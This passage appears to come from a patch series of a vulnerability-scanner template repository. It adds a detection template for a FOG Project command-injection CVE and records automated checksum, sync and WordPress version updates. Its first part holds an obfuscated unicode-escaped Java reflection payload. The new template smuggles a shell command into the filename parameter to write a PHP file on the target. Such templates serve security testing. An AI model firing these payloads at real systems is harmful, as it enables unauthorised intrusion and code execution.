5\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelName=test matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "4de0353d63cc9ab4286361a4ff3f12d1" - condition: and + - "{{string}}" - type: status status: - - 200 \ No newline at end of file + - 200 From d7534c8e71c62cfa4ee93d12608fc948c3219b83 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 24 Jul 2024 16:57:07 +0000 Subject: [PATCH 1600/1841] Auto Generated New Template Addition List [Wed Jul 24 16:57:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c2bb953500..3efce6c0fa 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-40348.yaml http/cves/2024/CVE-2024-4257.yaml +http/cves/2024/CVE-2024-4295.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-4885.yaml http/cves/2024/CVE-2024-5217.yaml From 3af42d8c2ceab3353de18b5618c7c2984633f863 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 16:57:13 +0000 Subject: [PATCH 1601/1841] Auto Generated Templates Checksum [Wed Jul 24 16:57:13 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4a86ae931f..638cafeea0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3502,6 +3502,7 @@ http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac +http/cves/2024/CVE-2024-4295.yaml:2fd73db13aa3bccef97bf8620bda8ef53846272c http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a @@ -8734,7 +8735,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:7cd6340c3fa3a4319484636c0e66cc257f00ad2c +javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 @@ -8917,7 +8918,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:67f7e72f351b27af8ff1ffb69addbf5be91c54cc +templates-checksum.txt:b014b3be801611aa889fc1bb44fe425b6a2ca604 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 13d2028464892f44ba282d8c6886448710a9eb9c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 24 Jul 2024 16:58:02 +0000 Subject: [PATCH 1602/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6cb071e53f..f97872dfa1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-40348.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' + - 'http/cves/2024/CVE-2024-4295.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-4885.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' From 8bc38d232d013ddc433305ad1635850e3bced047 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 16:58:58 +0000 Subject: [PATCH 1603/1841] Auto Template Signing [Wed Jul 24 16:58:58 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4295.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml index 424971ff76..666440d967 100644 --- a/http/cves/2024/CVE-2024-4295.yaml +++ b/http/cves/2024/CVE-2024-4295.yaml @@ -50,3 +50,4 @@ http: - 'duration>=5' - 'contains(body, "You have been successfully subscribed")' condition: and +# digest: 4a0a00473045022100dd868ae91fb7942535be7679969cae0bd50adb2ec5ed2086dfbd351a6d87091a02206dd8ae86c365327b6647d7142be60f8e2008dbbea66471b6a2865fc315ae67ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c5b76edbfb9099c1468f9a1ca65d6e89974542b3 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 24 Jul 2024 22:39:34 +0300 Subject: [PATCH 1604/1841] add CVE-2024-39914 --- http/cves/2024/CVE-2024-39914.yaml | 62 ++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 http/cves/2024/CVE-2024-39914.yaml diff --git a/http/cves/2024/CVE-2024-39914.yaml b/http/cves/2024/CVE-2024-39914.yaml new file mode 100644 index 0000000000..6b6d5bc422 --- /dev/null +++ b/http/cves/2024/CVE-2024-39914.yaml @@ -0,0 +1,62 @@ +id: CVE-2024-39914 + +info: + name: FOG Project < 1.5.10.34 - Remote Command Execution + author: securityforeveryone + severity: critical + description: | + FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34. + remediation: Fixed in 1.5.10.34 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-39914 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914 + - https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j + - https://blog.csdn.net/qq_39894062/article/details/140550009 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-39914 + cwe-id: CWE-77 + epss-score: 0.00043 + epss-percentile: 0.09367 + metadata: + vendor: fogproject + product: fogproject + fofa-query: icon_hash="-1952619005" + tags: cve,cve2024,rce,fog +variables: + filename: "{{to_lower(rand_text_alpha(12))}}" + num: "{{rand_int(1000, 9999)}}" + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /management/export.php?filename=$(echo+''+>+{{filename}}.php)&type=pdf HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + fogguiuser=fog&nojson=2 + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"No HTML files!","HTMLDOC")' + - 'contains(content_type, "application/pdf")' + - status_code == 200 + condition: and + internal: true + + - raw: + - | + GET /management/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"{{md5(num)}}")' + - 'contains(content_type, "text/html")' + - status_code == 200 + condition: and From 79ad416e52fd5bbafa22ecfd6c52b29b157701e0 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 24 Jul 2024 22:46:23 +0300 Subject: [PATCH 1605/1841] fix --- http/cves/2024/CVE-2024-39914.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-39914.yaml b/http/cves/2024/CVE-2024-39914.yaml index 6b6d5bc422..e37daae58f 100644 --- a/http/cves/2024/CVE-2024-39914.yaml +++ b/http/cves/2024/CVE-2024-39914.yaml @@ -25,8 +25,8 @@ info: fofa-query: icon_hash="-1952619005" tags: cve,cve2024,rce,fog variables: - filename: "{{to_lower(rand_text_alpha(12))}}" - num: "{{rand_int(1000, 9999)}}" + filename: "{{to_lower(rand_text_alpha(12))}}" + num: "{{rand_int(1000, 9999)}}" flow: http(1) && http(2) From 89d507ce3e7b39fc8b8d1d88887848775ce8c4b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Jul 2024 00:19:57 +0000 Subject: [PATCH 1606/1841] Auto WordPress Plugins Update [Thu Jul 25 00:19:57 UTC 2024] :robot: --- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/happy-elementor-addons.txt | 2 +- helpers/wordpress/plugins/hostinger.txt | 2 +- helpers/wordpress/plugins/loginizer.txt | 2 +- helpers/wordpress/plugins/post-types-order.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 8 insertions(+), 208 deletions(-) diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index 0444f32076..acf9bf09db 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -3.2.1 \ No newline at end of file +3.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 5b013b97d6..62ae32d582 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.7.6 \ No newline at end of file +2.7.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/happy-elementor-addons.txt b/helpers/wordpress/plugins/happy-elementor-addons.txt index f4687fd4f7..fc89ddd220 100644 --- a/helpers/wordpress/plugins/happy-elementor-addons.txt +++ b/helpers/wordpress/plugins/happy-elementor-addons.txt @@ -1 +1 @@ -3.11.2 \ No newline at end of file +3.11.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index b38ebbfce2..7da3c16870 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -3.0.4 \ No newline at end of file +3.0.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index 8b315b3fed..5af131d650 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.8.8 \ No newline at end of file +1.8.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-types-order.txt b/helpers/wordpress/plugins/post-types-order.txt index 6b4d157738..047615559c 100644 --- a/helpers/wordpress/plugins/post-types-order.txt +++ b/helpers/wordpress/plugins/post-types-order.txt @@ -1 +1 @@ -2.2.3 \ No newline at end of file +2.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 548ceff894..fd80be4c83 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.223 \ No newline at end of file +1.0.224 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 94c669e9ea..22d97974cc 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.6.0.1 \ No newline at end of file +6.6.0.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cb24bd678..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201f21504b21a873bcdb94f678e1426bb07b9693c1a29fcc701e5a071aefeafda302210096be4cd588751d06eb4ea4fd3b8d37e73fa2217a3a085bc5813bf5c12965814c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 1f1966f689..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015ee64ab7e513fa0e9facd9c960d56ac2ae53fc5081a38e55f08199c23626ef2022053ed46df9e265ab8c9c74f1443ab51a46f26172ff5e4b312d5da13c63c98a324:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 2ab5a071fa..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e7624bd3e49f6745065de72eb48f65ac369d2bdf06c0fbaaf8c5e5f962deb0c0220247db6de468795e38aaa4341b7ea91a287686be1975b5ebad7f89afe27f6b37e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 294511fd09..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100efb4dea514e116df1f25917bc04f9416fafacd32e1c95658d3e08e5eafe0ad3f022045f1ac2343a0f9a9366156f85b3a8ba80b56c6c02218ce7e1665b71331b06ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index bd7a57609e..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ 